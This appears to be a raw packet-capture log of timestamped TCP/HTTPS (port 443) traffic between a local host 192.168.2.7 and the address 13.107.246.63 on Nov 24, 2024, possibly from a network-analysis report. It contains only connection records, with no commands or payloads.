                                                                                                                                                                        Nov 24, 2024 05:12:05.436180115 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.436203003 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.436216116 CET49835443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.436223030 CET4434983513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.439589024 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.439621925 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.439848900 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.440058947 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.440073013 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.444627047 CET4434983413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.447978973 CET4434983413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.448040962 CET4434983413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.448059082 CET49834443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.448137999 CET49834443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.448209047 CET49834443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.448247910 CET4434983413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.448275089 CET49834443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.448288918 CET4434983413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.450788975 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.450818062 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.451056004 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.451196909 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.451217890 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.465015888 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.465352058 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.465367079 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.466475964 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.466581106 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.466878891 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.466943026 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.466969967 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.507335901 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.521260977 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.521282911 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.567321062 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.603816032 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.604130030 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.604152918 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.605684042 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.605736971 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.606162071 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.606256962 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.606408119 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.606416941 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.647052050 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.957480907 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957509995 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957518101 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957532883 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957540035 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957566977 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957633018 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.957633018 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:05.957650900 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:05.957726955 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.102361917 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102395058 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102404118 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102431059 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102468014 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102475882 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.102494001 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.102528095 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.102549076 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.108364105 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.108407021 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.108470917 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.111747980 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.111762047 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.138333082 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.138351917 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.138390064 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.138534069 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.138534069 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.138555050 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.138607025 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.184674978 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.184699059 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.184789896 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.184791088 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.184803963 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.184891939 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.291053057 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.291099072 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.291138887 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.291158915 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.291171074 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.291275978 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.311549902 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.311588049 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.311686039 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.311686039 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.311700106 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.311743021 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.344110966 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.344149113 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.344192028 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.344218969 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.344233990 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.344259977 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.347906113 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.347970009 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.348000050 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.348021984 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.348048925 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.348120928 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.368243933 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.368311882 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.368340015 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.368349075 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.368392944 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.368392944 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.378534079 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.378628016 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.378635883 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.378652096 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.378699064 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.378798008 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.378813028 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.378838062 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.378861904 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.385524035 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.385570049 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.385664940 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.385682106 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.385756969 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.495121956 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.495189905 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.495210886 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.495239019 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.495275974 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.495332003 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.513151884 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.513199091 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.513300896 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.513324022 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.513364077 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.513364077 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.529052973 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.529117107 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.529191971 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.529191971 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.529206038 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.529278040 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.543555975 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.543606043 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.543658018 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.543670893 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.543695927 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.543720961 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.553055048 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.553232908 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.553333044 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.554291010 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.554313898 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.799618006 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.800223112 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.800312996 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:06.800733089 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:06.800753117 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.009150028 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.009752989 CET49842443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.009778023 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.010236025 CET49842443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.010241032 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.075004101 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.075578928 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.075661898 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.076086044 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.076101065 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.160365105 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.161066055 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.161094904 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.161552906 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.161559105 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.232927084 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.235337019 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.235896111 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.235913992 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.236135960 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.236377001 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.236385107 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.236408949 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.236507893 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.236531019 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.236562014 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.236567974 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.240634918 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.240679026 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.240896940 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.240998983 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.241014957 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.461359978 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.464422941 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.465141058 CET49842443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.468142986 CET49842443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.468163967 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.468205929 CET49842443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.468213081 CET4434984213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.483746052 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.483773947 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.483870029 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.484163046 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.484170914 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.518610001 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.518635988 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.518707037 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.518795967 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.518845081 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.518910885 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.519351006 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.519351006 CET49843443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.519388914 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.519412041 CET4434984313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.558959007 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.559015989 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.559084892 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.559407949 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.559425116 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.605364084 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.605524063 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.605585098 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.605968952 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.605986118 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.605998039 CET49844443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.606003046 CET4434984413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.612622976 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.612634897 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.612699032 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.612879038 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.612894058 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.679591894 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.682590961 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.685610056 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.685892105 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.685910940 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.685921907 CET49845443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.685926914 CET4434984513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.689691067 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.689716101 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.689778090 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.690032959 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.690041065 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.829771042 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.831051111 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.831058025 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.831571102 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.834089041 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.834166050 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:07.834223032 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:07.879324913 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.268518925 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.268589973 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.268723011 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.275144100 CET49852443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.275172949 CET4434985213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.294116974 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.294150114 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.294792891 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.295404911 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.295418024 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.954349041 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.954905033 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.954961061 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:08.955462933 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:08.955470085 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.200293064 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.200871944 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.200885057 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.201339006 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.201343060 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.388288975 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.390475988 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.391019106 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.391057014 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.391494036 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.391501904 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.391619921 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.391675949 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.391720057 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.391738892 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.391752005 CET49853443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.391757965 CET4434985313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.395030022 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.395068884 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.395143986 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.395330906 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.395338058 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.404823065 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.405278921 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.405313015 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.405730009 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.405736923 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.409440041 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.409827948 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.409857035 CET4434985713.107.246.63192.168.2.7
